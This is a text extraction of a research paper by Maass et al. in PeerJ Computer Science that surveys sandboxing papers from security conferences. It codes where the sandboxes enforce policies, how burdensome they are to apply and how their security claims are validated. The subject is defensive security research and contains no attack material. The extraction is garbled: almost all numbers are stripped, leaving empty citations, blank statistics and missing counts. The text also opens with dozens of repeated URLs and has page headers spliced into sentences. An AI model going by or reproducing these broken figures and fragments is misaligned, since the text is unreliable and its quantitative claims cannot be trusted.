http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html http://dx.doi.org/ . /peerj-cs. table our research questions, the areas each question attempts to illuminate, and potential answers. the answers are codes in the content analysis process we apply. answers are not necessarily mutually exclusive. definitions for the terms in this table appear in our coding frames (see supplemental information ) with examples. question area question possible answers where in the architecture are policies enforced? component, application, host sandbox lifecycle how and when are policies imposed? statically, dynamically, hybrid what resources do the sandboxes protect? memory, code/instructions, files, user data, communications which components do the sandboxes protect? component, application, application classsecurity outcomes at what point will sandboxes catch exploits? pre-exploit, post-exploit what must be done to apply the sandboxes? nothing, select pre-made policy, write policy, run tool, install tool effort and applicability what are the requirements on sandboxed components? none, source code, annotated source code, special compiler, compiler-introduced metadata, sandbox framework/library components who defines policies? sandbox developer (fixed), sandbox user (user-defined), application developer (application-defined) how are policies managed? central policy repository, no managementpolicy provenance and manifestation how are policies constructed? encoded in sandbox logic, encoded in application logic, user written what claims are made about sandboxes? performance, security, applicability how are claims validated? proof, analytical analysis, benchmark suite, case studies, argumentation, using public dataresearch claims and validation how are sandboxes released for review? source code, binaries, not available • techniques are applied using some form of automation (e.g., not through entirely manual re-architecting) • a policy is imposed on an identifiable category of applications or application subsets - the policy is imposed locally on an application (e.g., not on the principal the application executes as, not on network packets in-transit, etc.) - the category encompasses a reasonable number of real-world applications (e.g., doesn’t require the use of ( ) a research programming language, ( ) extensive annotations, or ( ) non-standard hardware) we gathered papers by reading each title in the conference proceedings for a given year. we included a paper in our initial dataset if the title gave any indication that the paper could meet the criteria. we refined the criteria by reviewing papers in the initial dataset from oakland before inspecting the proceedings from other venues. we read the remaining papers’ abstracts, introductions, and conclusions and excluded papers as they were being interpreted if they did not meet the criteria. we maintained notes about why individual papers were excluded from the final set. our full list of papers with exclusion notes is available in supplemental information . categorizing the dataset to interpret papers we developed coding frames where a category is a research question our full coding frames are available in supplemental information . and a code is a possible answer to the question. to ensure consistency in coding, our frames maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. include detailed definitions and examples for each category and code. our codes are not mutually exclusive: a question may have multiple answers. we developed the majority of our frames before performing a detailed analysis of the data, but with consideration for what we learned about sandboxing papers while testing the inclusion criteria above on our data from oakland. we learned that evaluative questions were quite interesting while cod- ing papers, thus frames concerning what claims were made about a sandbox and how those claims were validated became more fine-grained as the process progressed. whenever we modified a frame, we updated the interpretations of all previously coded papers. we tested the frames by having two coders interpret different subsets of the oakland segment of the initial dataset. to interpret a paper, each category was assigned the appropriate code(s) and a quote justifying each code selection was highlighted and tagged in the paper’s pdf. while testing, the coders swapped quotes sans codes and a full list of quotes with code assign- ments is available in supplemental information . independently re-assigned codes to ensure consistency, but we did not measure inter-rater reliability. code definitions were revised where they were ambiguous. while there is still some risk that different coders would select different quotes or assign codes to the same quote, we believe our methodology sufficiently mitigated the risk without substantially burdening the process given the large scope of this effort. after coding every paper, we organized the codes for each paper by category in a unified machine-readable file (hereafter referred to as the summary of coded papers) for further the summarized version of our dataset is available as supplemental information . this spreadsheet was converted to a csv file to perform statistical and graph-based analyses. processing. analyzing the dataset to summarize the differences and similarities between sandboxing papers, we attempted to identify clusters of similar sandboxing techniques. to do so, we first calculated a dissimilarity matrix for the sandboxes. for category k, let pijk be the number of codes that sandboxes i and j share, divided by the total number of codes in that category they could share. for categories in which each sandbox is interpreted with one and only one code, pijk is either or ; for other categories, it falls in the interval [ , ]. then the dissimilarity between i and j is dij =  k( − pijk). we fed the resulting dissimilarity matrix into a hierarchical agglomerative clustering algorithm (kaufman & rousseeuw, ) (implemented in r with the cluster package (r core team, ; maechler et al., )). this algorithm begins by treating each sandbox as its own cluster, and then iteratively merges the clusters that are nearest to each other, where distance between two clusters is defined as the average dissimilarity between the clusters’ members. the agglomerative clustering process is displayed in dendrograms. we stopped the agglomerative process at the point at which there were two clusters remaining, producing two lists of sandboxes, one list for each cluster. to interpret the resulting clusters, we produced bar charts displaying the code membership by cluster. we conducted this analysis three times: once using all of the categories to define dissimilarity, once using all categories except those for claims, validation, and availability, and once using the validation categories. we do not present the plots from the analysis that ignored claims, validation, and availability because it did not produce results different from those generated using all categories. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. we conducted correlational analyses to learn whether sandbox validation techniques have improved or worsened over time, or whether sandbox publications with better (or worse) validation received more citations. the validation codes were ordered in the following way: proof > analytical analysis > benchmarks > case study > argumentation > none. this ordering favors validation techniques that are less subjective. while it is possible for a highly ranked technique to be applied less effectively than a lower ranked technique (e.g., a proof that relies on unrealistic assumptions relative to a thorough case study) this ranking was devised after coding the papers and is motivated by the real world applications of each technique in our dataset. each claim type (security, performance, and applicability), then, was an ordinal random variable, so rank-based methods were appropriate. when a sandbox paper belonged to two codes in a particular validation category, we used its highest-ordered code to define its rank, and lower-ordered codes to break ties. so, for instance, if paper a and paper b both included proofs, and paper a also included benchmarks, paper a would be ranked higher than paper b. to test if a claim type was improving over time, we estimated the spearman correlation (spearman, ) between its codes and the year of publication, and hence tested for a monotonic trend. testing if papers with better validation, in a particular category, received more citations necessitated accounting for year of publication, since earlier papers typically have higher citation counts. to do so, we regressed paper citation rank against both publication year and category rank. (we used the rank of papers’ citation counts as the dependent variable, as opposed to the citation counts themselves, due to the presence of an influential outlier—terra (garfinkel et al., ). scatterplots show the relationship between citation ranks and publication year to be approximately linear, so a linear adjustment should suffice.) there was a “validation effect” if the coefficient on the validation measure was significantly different from zero. we conducted four separate regression analyses: one in which citation ranks were regressed on publication year and category ranks of all three validation criteria, and one in which citation ranks were regressed on publication year and security validation only, one in which citation ranks were regressed on publication year and performance validation only, and one in which citation ranks were regressed on publication year and applicability validation only. we constructed a citation graph using the papers in our set as nodes and citations as edges as a final means of better understanding the sandboxing landscape. we clustered the nodes in this graph using the same clusters found statistically, using the process describe above, and using common topics of interest we observed. the topics of interest are typically based on the techniques the sandboxes apply (e.g., control flow integrity (cfi), artificial diversity, etc.). we evaluate these clusters using the modularity metric, which enables us to compare the quality of the different categorizations. modularity is the fraction of edges that lie within a partition, above the number that would be expected if edges were distributed randomly. results we derived our results from the various statistical clusters of our summary of coded papers, trends explicit in this dataset, and observations made while reading the papers maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. or analyzing our summarized data. as our dataset is public, we encourage readers to explore the data themselves. note while interpreting the statistical clusters that they are not representative of how papers are related in terms of broad topics of interest. when we applied the statistical clusters to the citation graph of the papers in our set the modularity scores were − . and . when papers were clustered based on all of the attributes we coded and just validation attributes respectively. these modularity scores mean that the statistical clusters are no better than randomly clustering papers when considering how they cite each other. these poor modularity scores make sense because authors are much more likely to cite papers that use similar techniques or tackle similar problems than use similar validation strategies. we confirmed the latter observation by computing that the modularity for overlapping groups (lázár, ábel & vicsek, ) based on validation is − . , which confirms that partitions built from the validation techniques do not direct citation graph structure. indeed, when we clustered papers in the citation graph based on topics of inter- est we observed while interpreting the set, the modularity score, . , is significantly better than a random cluster. the citation graph with topic clusters is shown in fig. . while these clusters are potentially of sociotechnical interest to the community, we must look at lower-level attributes to understand how sandboxes are to be applied in practice and how they improve the security posture of real systems. the statistical clusters fill that role. figures and show the codes that are members of the fixed policy and user-defined policy clusters respectively when all categories are considered. the dendrogram for these clusters appears in fig. . many of our results are interpretations of these charts. table succinctly describes our results per research question and references later sections where more details are found. the remainder of this section presents those details. sandboxes: building materials for secure systems sandboxes are flexible security layers ready to improve the security posture of nearly any type of application. while the deployment requirements and details vary from sandbox to sandbox, collectively they can be applied at many different points in a system’s architecture and may be introduced at any phase in an application’s development lifecycle, starting with the initial implementation. in fact, sandboxes can even be applied well after an application has been abandoned by its maintainer to secure legacy systems. in our dataset, the policy enforcement mechanism for a sandbox is always deployed as a system component, as a component of an application host, or by insertion directly into the component that is being encapsulated. while application hosts are becoming more popular as many applications are moved into web browsers and mobile environments, they are currently the least popular place to deploy policy enforcement mechanisms for research sandboxes. our set includes ten sandboxes where policies are enforced in the application host, twenty-six in the component being encapsulated, and thirty-two in a sehr et al. ( ) is counted twice because the enforcement mechanism is spread across the application and its host. system component. we believe that application hosts are less represented because many existing hosts come with a sandbox (e.g., the java sandbox, android’s application sandbox, nacl in google maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table summary of our research questions and results. research question results section where in a system’s architecture are policies enforced? there is an emphasis on enforcing policies in the operating system or transforming applications to enforce a policy over using application hosts (e.g., language-hosting virtual machines, browsers, etc.). ‘sandboxes: building materials for secure systems’ when are policies imposed? static, dynamic, and hybrid strategies are roughly equally favored in all domains but with a slight preference for strictly static or dynamic approaches. ‘sandboxes: building materials for secure systems’ what application resources are protected by sandboxes? sandboxes with fixed policies tend to prevent memory corrup- tion or protect properties of application code (e.g., control flow). user-defined policies are correlated with policies that are more diverse and cover the gamut of application-managed resources. ‘sandboxes: building materials for secure systems’ what types of components are protected by sandboxes? sandboxes that use fixed policies tend to require the user to target specific components, while those with user-defined policies tend to allow for broader targeting. ‘sandboxes: building materials for secure systems’ at what point in the process of an attack will an exploit violate sandbox policies? sandboxes are primarily pro-active by disrupting exploits before a payload can be executed. where users must define a policy, sandboxes tend to be pro-active in attempting to stop exploits, but also limit the range of possible behaviors a payload can exhibit. ‘sandboxes: building materials for secure systems’ what are the requirements of people applying sandboxes? sandboxes that have fewer requirements for peo- ple tend to have more requirements for the appli- cation. similarly, having a fixed policy is correlated with more requirements of the application, while user-defined policies are correlated with more requirements of the user. ‘policy flexibility as a usability bellwether’ what are the requirements of compo- nents being sandboxed? sandboxes with fixed policies most-often require that applications be compiled using a special compiler. ‘policy flexibility as a usability bellwether’ who defines sandbox policies? policies are most often defined by the sandbox developer at design time. ‘policy flexibility as a usability bellwether’ how are policies managed? policy management is largely ignored, even where users must write their own policies. ‘policy flexibility as a usability bellwether’ how are policies constructed? most policies are hardcoded in the sandbox. ‘policy flexibility as a usability bellwether’ what claims are made about sandboxes? applicability to new cases is often the impetus for im- proving existing techniques, but strong security and better performance are more often claimed. ‘the state of practice in sandbox validation’ how are claims validated? benchmarks and case studies are the most favored validation techniques for all types of claims. where security claims are not validated using both benchmarks and case studies, ad-hoc arguments are heavily favored. ‘the state of practice in sandbox validation’ in what forms are sandboxes made available for review? there is a recent slight increase in the release of sandbox source code, but generally no implementation artifacts are made available for review. ‘the state of practice in sandbox validation’ chrome, etc.). indeed, all but one of the sandboxes deployed in application hosts are for the web, where applications can gain substantial benefits from further encapsulation and there is currently no de facto sandbox. the one exception is robusta (siefers, tan & morrisett, ), which enhances the java sandbox to encapsulate additional non-web computations. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the citation graph for the papers in our set. the colors represent clusters based on topics of interest (modularity = . ). papers cluster based on topics of interest, not necessarily their technical attributes or validation stratgies, thus we must look at lower level attributes to gain a broad understanding of the sandboxing landscape. papers that were not linked to any of the other papers in the set are not shown. categories bridging mandatory integrity and access control (mi/ac) were collapsed to simply mandatory access control (mac) for this graph. our citation data can be found in supplemental information . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure breakdown of the representation of all codes for papers that emphasize fixed policies. cases where a claim was made but not validated are labeled with an “x”. system components are heavily represented because any sandbox that is to encapsulate a kernel, driver, or other system component must necessarily enforce the policy in a system component. fifteen of the sandboxes fall into this category because they are encapsulating either a kernel or hypervisor. the remainder could potentially enforce their policies from a less privileged position, but take advantage of the full access to data and transparency to user-mode applications available to system components. this power is useful when enforcing information flow across applications, when preventing memory corruption, or when otherwise enforcing the same policy on every user-mode application. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure breakdown of the representation of all codes for papers that emphasize user-defined policies. some sandboxes support a fixed-policy with an optional user-defined policy (e.g., siefers, tan & morrisett, ). cases where a claim was made but not validated are labeled with an “x”. research sandboxes almost universally embed their enforcement mechanism in the application that is being encapsulated when the application runs in user-mode. application deployment is correlated with fixed policies where modifying the application itself can lead to higher performance and where it makes sense to ensure the enforcement mechanisms exist anywhere the application is, even if the application moves to a different environment. fixed-policies with embedded enforcement mechanisms are correlated with another important deployment concern: statically imposed policies. imposing a policy statically, most often using a special compiler or program re-writer, is advantageous because the policy and its enforcement mechanism can travel with the ap- maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a dendrogram displaying the clusters for sandboxing papers taking into account all categories. at the topmost level, where two clusters exist, the clusters respectively represent sandboxes that use fixed policies and those that use user-defined policies. plication and overhead can be lower as enforcement is tailored to the targeted code. there are some cons to this approach. for example, the process of imposing the policy cannot be dependent on information that is only available at run-time and the policy is relatively unadaptable after it is set. furthermore, because the policies are less adaptable, sandboxes that statically impose security policies typically only encapsulate components that are targeted by the person applying the sandbox. these are cases where dynamic mechanisms shine. given these trade-offs, it makes sense that papers in our set fall into one of two clus- ters when all codes are considered: those that are protecting memory and software code, which are relatively easy to encapsulate with a fixed policy, and those managing behaviors manifested in external application communications or interactions with user-data and files that are more easily encapsulated with an adaptable (typically user-defined) policy. generally hybrid deployments are used when the approach is necessarily dynamic but static pre-processing lowers overhead. sometimes, techniques begin as hybrid approaches and evolve to fully dynamic approaches as they gain traction. for example, early papers that introduce diversity in binaries to make reliable exploits harder to write (e.g., code randomization), tend to rely on compiler-introduced metadata, while later papers did not need the extra help. this evolution broadens the applicability of the sandboxing technique. we observed other techniques such as sfi and cfi evolve by reducing the number of requirements on the application, the person applying the sandbox, or both. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. policy flexibility as a usability bellwether requiring more work out of the user or more specific attributes of an application lowers the odds that a sandbox will be applied, thus it is natural that research on specific techniques reduce these burdens over time. we find that the nature of the policy has an influence on how burdensome a sandbox is. about half of sandboxes with fixed policies require the application be compiled using a special compiler or uses a sandbox-specific framework or library. many fixed-policy sandboxes also require the user to run a tool, often a program re-writer, or to install some sandbox component. in comparison, nearly all sandboxes with flexible policies require the user to write a policy manually, but few have additional requirements for the application. given the burdens involved in manually writing a security policy, the message is clear—easy to use sandboxes reduce the user-facing flexibility of the policies they impose. forty-eight sandboxes, more than two-thirds of our sample, use a fixed policy. in all of these cases the policy itself exists within the logic of the sandbox. in the remaining cases, the policy is encoded in the logic of the application twice (e.g., through the use of the sandbox as a framework), and the remaining seventeen cases require the user to manually write a policy. in cases where the user must manually write the policy, it would help the user if the sandbox supported a mechanism for managing policies—to ensure policies do not have to be duplicated repeatedly for the same application, to generate starter policies for specific cases, to ensure policies can apply to multiple applications, etc. this type of management reduces the burden of having to manually write policies in potentially complex custom policy languages. support for the policy writer is also important because the policies them- selves can be a source of vulnerabilities (rosenberg, ). eight out of twenty-six cases where policy management is appropriate offered some central mechanism for storing ex- isting policies, where they could potentially be shared among users. however, none of the papers in our sample list policy management as a contribution, nor do any of the papers at- tempt to validate any management constructs that are present. however, it is possible that there are papers outside of our target conferences that explicitly discuss management. for example, programming languages and software engineering conferences are more focused on policy authoring concerns and management may therefore be the focus of a paper that appears in one of those conferences. however, in spite of the fact that two of the authors of this paper are active researchers in the programming language community and three are active in the software engineering community, we are not aware of any such paper. the state of practice in sandbox validation there is little variation in the claims that are made about sandboxes. most claim to either encapsulate a set of threats or to increase the difficulty of writing successful exploits for code-level vulnerabilities. all but four measure the performance overhead introduced by the sandbox. thirty-seven papers, more than half, make claims about the types of components the sandbox applies to, typically because the paper applies an existing technique to a different domain or extends it to additional components. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. while there is wide variety in how these claims are validated, we observe measurable patterns. in our data set, proof and analytical analysis were, by far, the least used techniques. the lack of analytical analysis is due to the fact that the technique is primarily useful when the security of the mechanism depends on randomness, which is true of few sandboxes in our set. however, proof appears in two cases: ( ) to prove properties of data flows and ( ) six papers prove the correctness of a mechanism enforcing a fixed policy. the rarity of proof in the sandboxing domain is not surprising given the difficulty involved. proof is particularly difficult in cases where one would ideally prove that a policy enforcement mechanism is capable of enforcing all possible policies a user can define, which we did not see attempted. instead, claims are often validated empirically or in ways that are ad hoc and qualitative. in empirical evaluations, case studies are the most common technique for all claims, often because proof was not attempted and there is no existing benchmark suite that highlights the novel aspects of the sandbox. for example, papers for sandboxes with fixed policies often want to show a particular class of vulnerabilities can no longer be exploited in sandboxed code, thus examples of vulnerable applications and exploits for their vulnerabilities must be gathered or, very rarely, synthesized. when claims were empirically validated, the results were not comparable in fifteen out of sixty-two cases for performance, twenty-two out of forty-two cases for security, and twenty-four out of thirty-one cases for applicability because non-public data was used in the discussed experiments. non-public data takes the form of unlabeled exploits, undisclosed changes to public applications, and unreleased custom example cases (e.g., applications built using a sandbox’s framework where the examples were not released). security claims are notoriously difficult to formalize, hence the pervasive lack of proof. many papers instead vet their security claims using multi-faceted strategies, often including both common empirical approaches: case studies and experiments using benchmark suites. however, figs. and illustrate an interesting finding: in twenty-nine papers where multi-faceted strategies are not used, authors pick one empirical tactic and argue that their claims are true. argumentation in this space is problematic because all of the arguments are ad hoc, which makes evaluations that should be comparable difficult to compare at best but more often incomparable. furthermore, we observed many cases where arguments essentially summarize as, “our sandbox is secure because the design is secure,” with details of the design occupying most of the paper in entirely qualitative form. not only are these types of arguments difficult to compare in cases where sandboxes are otherwise quite similar, it is even harder to see if they are complete in the sense that every sub-claim is adequately addressed. our correlational analyses show no significant trends in security or applicability analyses, however performance validation has improved over time. table summarizes the spearman correlations and their p-values per validation category. spearman correlations fall in the range [− , ], where a value of is interpreted as no correlation, positive values show a positive correlation, and negative values a negative correlation. the magnitude of the coefficient grows towards as time and the validation rank become closer to perfect maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a dendrogram displaying the clusters for sandboxing papers taking into account validation categories. at the topmost level, where two clusters exist, the clusters respectively represent sandboxes that emphasize multi-faceted empirical security validation and those that do not. monotonic functions (i.e., when a positive and perfect monotonic relationship exists, the spearman correlation is ). performance validation is positively, and statistically significantly, correlated with the passage of time. we observe that performance validation has advanced from a heavy reliance on benchmark suites to the use multi-faceted strategies that include the use of benchmark suites and case studies (typically to perform micro-benchmarks) that make use of public data—which ensures the results are comparable with future sandboxes. while the applicability validation correlation is not statistically significant, we observe that argumentation was abandoned early on in favor of case studies, with some emphasis on including benchmark suites in later years. there is no apparent change in security validation over time. we fit linear models to each validation category separately and together relative to ranked citation counts to see if validation practices are predictive of future citations. all of the models achieved an r-squared value of . which suggests that passage of time and validation practices jointly explain about half of the variance in citation count ranks. validation practices on their own are not predictive of how highly cited a paper will maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure breakdown of the representation of validation codes per claim type for the three validation clusters found in our dataset. each row contains the data for one cluster. the bottom two clusters include papers that do not emphasize multi-faceted security validation strategies, instead relying on case studies and arguments that security claims are true. cases where a claim was made but not validated are labeled with an “x”. become. table summarizes the types of claims and the validation strategies employed per type for each paper in our set. strengthening sandboxing results the existing body of knowledge within the sandboxing community provides a strong basis for securing current and future software systems. however, the results in ‘results’ highlight maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the spearman correlations and their statistical significances per validation category. data with correlation coefficients closer to have stronger correlations. correlation (ρ) p-value security validation − . . performance validation . . applicability validation . . several gaps. in this section we discuss how structured arguments can solve the problems presented by incomparable and incomplete ad hoc arguments (‘structured arguments’) and possible ways to enhance sandbox and policy usability (sandbox and policy usability). structured arguments sandboxes are often evaluated against coarse criteria such as the ability to stop exploits against certain classes of vulnerabilities, to encapsulate certain categories of operations, or to function in new environments. however, these coarse criteria typically require the sandbox to address a number of sub-criteria. for example, zhang & sekar ( ) provide cfi without requiring compiler support or a priori metadata, unlike earlier implementations. to ensure the technique is secure, they must be sure that independently transformed program modules maintain cfi when composed. details that clarify how an individual criterion is fulfilled can easily be lost when ad hoc arguments are used in an effort to persuade readers that the criterion has been met; particularly in sandboxes with non-trivial design and implementation details. this can leave the reader unable to compare similar sandboxes or confused about whether or not contributions were validated. since many of the security criteria are repeated across most papers, the cost of developing substructure can be amortized across lots of communal use. there are many possible ways to structure arguments in support to security claims: • assurance cases (weinstock, lipson & goodenough, ; kelly, ) provide graphical structures that explicitly tie claims together in trees that show how claims are nar- rowed. knight ( ) provides a concise introduction to the topic. these structures also explicitly link leaf claims to the evidence that supports the claim. assurance cases were created in response to several fatal accidents resulting from failures to systematically and thoroughly understand safety concerns in physical systems. their use has spread to security and safety critical systems of nearly every variety in recent decades with case studies from aerospace (graydon, knight & strunk, ) and a sandbox called s (rodes et al., ) that was not analyzed as part of this study (nguyen-tuong et al., ). sandboxing papers can use assurance cases to decompose claims to their most simple components, then link those components to relevant evidence in the paper (e.g., a summary of specific results, a specific section reference, etc.). • maass, scherlis & aldrich ( ) use a qualitative framework to compare sandboxes based on what happens when a sandbox fails, is bypassed, or holds. authors could maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table claims made about sandboxes ( : security, : performance, and : applicability) and their validation strategies ( : proof, : an- alytical analysis, : benchmarks, : case studies, and : argumentation). grayed out icons mean a claim was not made or a strategy was not used. icons made by freepik from www.flaticon.com. category citation conference claims val. val. val. other (syscall) provos ( ) usenix virtualization garfinkel et al. ( ) sosp diversity bhatkar, sekar & duvarney ( ) usenix other (syscall) linn et al. ( ) usenix cfi abadi et al. ( ) ccs other (memory) ringenburg & grossman ( ) ccs mac efstathopoulos et al. ( ) sosp web cox et al. ( ) oakland sfi mccamant & morrisett ( ) usenix cfi, sfi erlingsson et al. ( ) osdi other (dfi) castro, costa & harris ( ) osdi web reis et al. ( ) osdi other (infoflow) zeldovich et al. ( ) osdi mi/ac li, mao & chen ( ) oakland web bandhakavi et al. ( ) ccs web chen, ross & wang ( ) ccs virtualization petroni & hicks ( ) ccs virtualization seshadri et al. ( ) sosp virtualization criswell et al. ( ) sosp web wang et al. ( ) sosp other (infoflow) krohn et al. ( ) sosp cfi akritidis et al. ( ) oakland virtualization payne et al. ( ) oakland mi/ac sun et al. ( ) oakland other (tainttrack) chang, streiff & lin ( ) ccs web oda et al. ( ) ccs other (os) williams et al. ( ) osdi sfi yee et al. ( ) oakland web louw & venkatakrishnan ( ) oakland web parno et al. ( ) oakland other (memory) akritidis et al. ( ) usenix virtualization wang et al. ( ) ccs sfi castro et al. ( ) sosp virtualization mccune et al. ( ) oakland web meyerovich & livshits ( ) oakland other (memory) akritidis ( ) usenix sfi sehr et al. ( ) usenix web louw, ganesh & venkatakrishnan ( ) usenix other (os) wurster & van oorschot ( ) ccs sfi, other (userpolicy) siefers, tan & morrisett ( ) ccs (continued on next page) maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/ . /peerj-cs. table (continued) category citation conference claims val. val. val. web feldman et al. ( ) osdi mi/ac owen et al. ( ) oakland other (transactions) jana, porter & shmatikov ( ) oakland cfi zeng, tan & morrisett ( ) ccs web saxena, molnar & livshits ( ) ccs web chen et al. ( ) ccs virtualization zhang et al. ( ) sosp sfi mao et al. ( ) sosp virtualization andrus et al. ( ) sosp diversity pappas, polychronakis & keromytis ( ) oakland diversity hiser et al. ( ) oakland sfi payer, hartmann & gross ( ) oakland cfi kemerlis, portokalidis & keromytis ( ) usenix diversity giuffrida, kuijsten & tanenbaum ( ) usenix mi/ac xu, saı̈di & anderson ( ) usenix diversity wartell et al. ( ) ccs web, other (infoflow) de groef et al. ( ) ccs virtualization dunn et al. ( ) osdi web (mi/ac) giffin et al. ( ) osdi cfi 